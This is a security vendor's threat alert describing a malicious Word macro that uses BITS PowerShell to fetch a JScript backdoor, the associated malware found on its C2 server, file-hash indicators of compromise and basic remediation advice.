Rewterz Threat Alert – A new breed of Separ Malware Targets Hundreds of Industrial Companies
December 18, 2019Rewterz Threat Alert – Fuel Dispenser Merchants Targeted by Cyber Criminals
December 19, 2019Rewterz Threat Alert – A new breed of Separ Malware Targets Hundreds of Industrial Companies
December 18, 2019Rewterz Threat Alert – Fuel Dispenser Merchants Targeted by Cyber Criminals
December 19, 2019Severity
Medium
Analysis Summary
Investigation into a suspicious Word document led Positive Technologies researchers to various malware hosted on extensive network infrastructure and, ultimately, the attacker behind the malicious activity. The initial analyzed file was a Word document containing a malicious macro that leverages the BITS PowerShell cmdlet to download and run a JScript file from a remote server. Pivoting off of the JScript file, various RTF, LNK, and Word samples were found using either the BITS PowerShell cmdlet or bitsadmin to download and execute the same payload. This JScript file was identified to be a WSH backdoor similar to the Houdini worm. After connecting to the C2 server and sending basic system information via HTTP POST requests, the victim host receives backdoor commands such as downloading and uploading files, stealing clipboard contents, and running commands. Reviewing the C2 server leveraged by this backdoor led to the discovery of a large number of malicious files. Included were a Houdini variant, a lightweight Java backdoor, a PowerShell Chrome stealer, a PowerShell keylogger, WebBrowserPassView, the NetWire RAT, TCP Listener, xRAT, and a server-side panel/builder for the aforementioned JScript backdoor.
Impact
Exposure of sensitive information
Indicators of Compromise
MD5
- 3305720da73efbcb7d25edbb7eff5a1a
- 5b6d77f3e48e7723498ede5d5ba54f26
- 621a0133e28edec77a2d3e75115b8655
- 712e7ec49ad3b8c91b326b6d5ee8dcd8
- 731a3d72e3d36c2270c1d0711c73c301
- 929374b35a73c59fe97b336d0c414389
SHA-256
- 6d6d5a57f32a6645abcb9ce402aa618fc51629939e6b86731368d404cec85248
- 5d6e46f4d3048878f0ebe894bf587e7641252b240e9dd75fe2c29f9d637012e6
- 79412cb99755ca488c05bd1b5b083cb5ca9f4697638af8895ed8262586bb8257
- bc5363ced3c90ca05b737742d6c04e6109ff72ec9a5063d763d45b1ae17e6f72
SHA1
- 151455ad2a5bae7513890c000068381d2148f517
- e4b2192303d48de7f1c9937eed2354759d982042
- a0edb127516072f07cba534b2634ee9f9e970889
- a3a7a317a87661cc0cc3a6340479a87a04c8fd95
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.